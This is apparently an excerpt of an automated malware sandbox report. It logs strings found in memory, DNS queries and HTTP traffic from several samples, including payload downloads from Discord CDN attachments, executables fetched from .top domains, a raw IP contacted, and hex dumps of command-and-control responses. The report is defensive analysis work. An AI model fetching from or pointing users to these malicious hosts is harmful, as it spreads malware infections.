Source: A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: 77DC.exe String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903702020781907998/4D0A6361.jpg
Source: 152F.exe, 00000023.00000003.505195772.0000000002EFB000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: 152F.exe, 00000023.00000003.505195772.0000000002EFB000.00000004.00000001.sdmp String found in binary or memory: https://telegram.org/img/t_logo.png
Source: 152F.exe, 00000023.00000003.505195772.0000000002EFB000.00000004.00000001.sdmp String found in binary or memory: https://toptelete.top/agrybirdsgamerept
Source: unknown DNS traffic detected: queries for: xacokuo8.top
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_004070B4 HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 34_2_004070B4
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1 Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1 Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: sysaheu90.top
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: toptelete.top
Source: global traffic HTTP traffic detected: GET //l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 91.219.236.97
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 5f 9f 87 cd 29 80 78 51 a1 a2 8f 4c 3d d8 1c e0 32 02 50 08 e8 df e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 e1 8a 20 59 55 11 5c 03 25 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 5d ca cc 8a 44 d8 06 0e 45 67 14 7d 63 fb e0 04 89 f9 d4 57 80 90 70 89 ec 24 4d 6b 0e e1 a2 22 48 32 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 83 97 5f 96 da 19 d1 3a 2d 12 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 7d 87 4a 04 38 cd 78 14 2c de e8 b1 14 c5 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 49 64 cd 25 5c 8d b7 1d 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 a5 32 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6e c9 ae d4 15 95 36 e1 48 50 67 7e 50 b8 81 be e5 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
